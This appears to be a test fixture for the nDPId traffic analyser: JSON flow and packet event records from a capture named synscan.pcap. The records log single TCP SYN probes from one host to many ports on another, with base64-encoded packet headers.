-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsF3sAACkGB\/isEAAIQA2GNIzTA4XdU4MZAAAAAGACCAAtBwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAssqYAADEGZMysEAAIQA2GNIzTB0jdU4MZAAAAAGACCAApRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs65AAADsGIeKsEAAIQA2GNIzTBAXdU4MZAAAAAGACEAAkhwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsWb4AADEGvbSsEAAIQA2GNIzSF2PdUoMYAAAAAGACCAAZLAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsQQkAAC4G2WmsEAAIQA2GNIzSJR7dUoMYAAAAAGACDAAHcQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsitoAADAGjZisEAAIQA2GNIzSAAHdUoMYAAAAAGACBAA0jgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsvtQAADQGVZ6sEAAIQA2GNIzSBBbdUoMYAAAAAGACBAAweQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsUaMAADoGvM+sEAAIQA2GNIzSbEPdUoMYAAAAAGACDADASwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6gAADQGTMqsEAAIQA2GNIzSG1rdUoMYAAAAAGACBAAZNQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsr\/8AACoGbnOsEAAIQA2GNIzSbindUoMYAAAAAGACDAC+ZQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kgAACUGOSqsEAAIQA2GNIzSBKLdUoMYAAAAAGACCAAr7QAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/WEAADMGGBGsEAAIQA2GNIzSAsHdUoMYAAAAAGACEAAlzgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ38AADoGpvOsEAAIQA2GNIzSB9ndUoMYAAAAAGACDAAktgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":64680,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":952,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAs5XcAADsGJ\/usEAAIQA2GNIzS\/KjdUoMYAAAAAGACEAAr5gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":953,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsxY4AADgGSuSsEAAIQA2GNIzSRrXdUoMYAAAAAGACBADt2QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49158,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":954,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsdRAAADYGnWKsEAAIQA2GNIzSwAbdUoMYAAAAAGACDABsiAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsie4AADMGi4SsEAAIQA2GNIzSD4PdUoMYAAAAAGACEAAZDAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059957,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"synscan.pcap","alias":"nDPId-test","flow_id":956,"flow_packet_id":1,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059957,"pkt":"ACYLMQczACWzv5HuCABFAAAsUTQAADcGwD6sEAAIQA2GNIzSGiHdUoMYAAAAAGACEAAObgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsHoUAADMG9u2sEAAIQA2GNIzTEcbdU4MZAAAAAGACEAAWxgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"synscan.pcap","alias":"nDPId-test","flow_id":958,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs7fQAAC4GLH6sEAAIQA2GNIzTF2XdU4MZAAAAAGACDAAVJwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":968,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsqdoAADQGapisEAAIQA2GNIzTBEXdU4MZAAAAAGACBAAwRwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAs5xkAADoGJ1msEAAIQA2GNIzTCindU4MZAAAAAGACDAAiYwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"synscan.pcap","alias":"nDPId-test","flow_id":961,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsY4kAADIGsumsEAAIQA2GNIzTA+rdU4MZAAAAAGACDAAoogAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":962,"flow_packet_id":1,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059961,"pkt":"ACYLMQczACWzv5HuCABFAAAsMEoAADMG5SisEAAIQA2GNIzTB9TdU4MZAAAAAGACEAAguAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059961,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 